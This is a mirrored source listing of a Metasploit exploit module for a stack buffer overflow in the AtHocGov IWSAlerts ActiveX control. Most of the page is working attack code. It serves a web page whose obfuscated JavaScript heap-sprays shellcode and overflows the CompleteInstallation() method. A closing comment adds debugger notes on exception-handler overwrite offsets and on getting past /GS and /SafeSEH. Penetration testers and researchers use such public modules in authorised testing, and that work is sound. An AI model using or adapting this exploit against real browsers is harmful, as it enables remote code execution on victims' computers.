Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/browser/athocgov_completeinstallation.rb
19592 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::Remote::HttpServer::HTML

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'AtHocGov IWSAlerts ActiveX Control Buffer Overflow',

16
        'Description' => %q{

17
          This module exploits a stack buffer overflow in AtHocGov IWSAlerts. When

18
          sending an overly long string to the CompleteInstallation() method of AtHocGovTBr.dll

19
          (6.1.4.36) an attacker may be able to execute arbitrary code. This

20
          vulnerability was silently patched by the vendor.

21
        },

22
        'License' => MSF_LICENSE,

23
        'Author' => [ 'MC' ],

24
        'References' => [

25
          [ 'OSVDB', '94557' ]

26
        ],

27
        'DefaultOptions' => {

28
          'EXITFUNC' => 'process',

29
        },

30
        'Payload' => {

31
          'Space' => 1024,

32
          'BadChars' => "\x00",

33
        },

34
        'Platform' => 'win',

35
        'Targets' => [

36
          [ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => '' } ]

37
        ],

38
        'DisclosureDate' => '2008-02-15',

39
        'DefaultTarget' => 0,

40
        'Notes' => {

41
          'Reliability' => UNKNOWN_RELIABILITY,

42
          'Stability' => UNKNOWN_STABILITY,

43
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

44
        }

45
      )

46
    )

47


48
    register_options(

49
      [

50
        OptString.new('URIPATH', [ true, "The URI to use.", "/" ])

51
      ]

52
    )

53
  end

54


55
  def autofilter

56
    false

57
  end

58


59
  def check_dependencies

60
    use_zlib

61
  end

62


63
  def on_request_uri(cli, request)

64
    # Re-generate the payload.

65
    return if ((p = regenerate_payload(cli)) == nil)

66


67
    # Encode the shellcode.

68
    shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

69


70
    ret = Rex::Text.uri_encode(Metasm::Shellcode.assemble(Metasm::Ia32.new, "or cl,[edx]").encode_string * 2)

71


72
    js = %Q|

73
      try {

74
        var evil_string = "";

75
        var index;

76
        var vulnerable = new ActiveXObject('AtHocGovGSTlBar.GSHelper.1');

77
        var my_unescape = unescape;

78
        var shellcode = '#{shellcode}';

79
        #{js_heap_spray}

80
        sprayHeap(my_unescape(shellcode), 0x0a0a0a0a, 0x40000);

81
        for (index = 0; index < 12500; index++) {

82
          evil_string = evil_string + my_unescape('#{ret}');

83
        }

84
        vulnerable.CompleteInstallation(evil_string);

85
      } catch( e ) { window.location = 'about:blank' ; }

86
    |

87


88
    opts = {

89
      'Strings' => true,

90
      'Symbols' => {

91
        'Variables' => [

92
          'vulnerable',

93
          'shellcode',

94
          'my_unescape',

95
          'index',

96
          'evil_string',

97
        ]

98
      }

99
    }

100
    js = ::Rex::Exploitation::ObfuscateJS.new(js, opts)

101
    js.update_opts(js_heap_spray.opts)

102
    js.obfuscate(memory_sensitive: true)

103
    content = %Q|

104
      <html>

105
      <body>

106
        <script><!--

107
        #{js}

108
        //</script>

109
      </body>

110
      </html>

111
      |

112


113
    print_status("Sending #{self.name}")

114


115
    # Transmit the response to the client

116
    send_response_html(cli, content)

117


118
    # Handle the payload

119
    handler(cli)

120
  end

121


122
end

123
=begin

124
IDL info...

125
  [id(0x00000022)]

126
  HRESULT CompleteInstallation([in] BSTR strParam);

127


128
$~/trunk/./msfpescan -f AtHocGovTBr.dll

129
AtHocGovTBr.dll: Microsoft Visual C++ v7.1 EXE [165]

130
AtHocGovTBr.dll: Microsoft Visual C++ v7.1 DLL [159]

131


132
// smash /GS

133
$~/trunk/./msfpescan -i AtHocGovTBr.dll | grep SecurityCookie

134
 SecurityCookie                 0x4278193c

135


136
// /SafeSEH, not today.

137
$~/trunk/./msfpescan -i AtHocGovTBr.dll | grep SEH

138
 SEHandlerTable                 0x42774e40

139
 SEHandlerCount                 0x0000021b

140


141
0:000> !exchain

142
0013cae0: ntdll!_except_handler3+0 (7c90ee18)

143
  CRT scope  0, filter: ntdll!RtlFreeHeap+613 (7c93bec5)

144
                func:   ntdll!RtlFreeHeap+617 (7c93bece)

145
0013cb1c: AtHocGovTBr!SetOfflineInstall+a0b4 (4274f944)

146
0013dd9c: 61473161

147
Invalid exception stack at 47306147

148
0:000> !pattern_offset 5140 0x47306147

149
[Byakugan] Control of 0x47306147 at offset 4680.

150
0:000> !pattern_offset 5140 0x61473161

151
[Byakugan] Control of 0x61473161 at offset 4684.

152
=end

153


154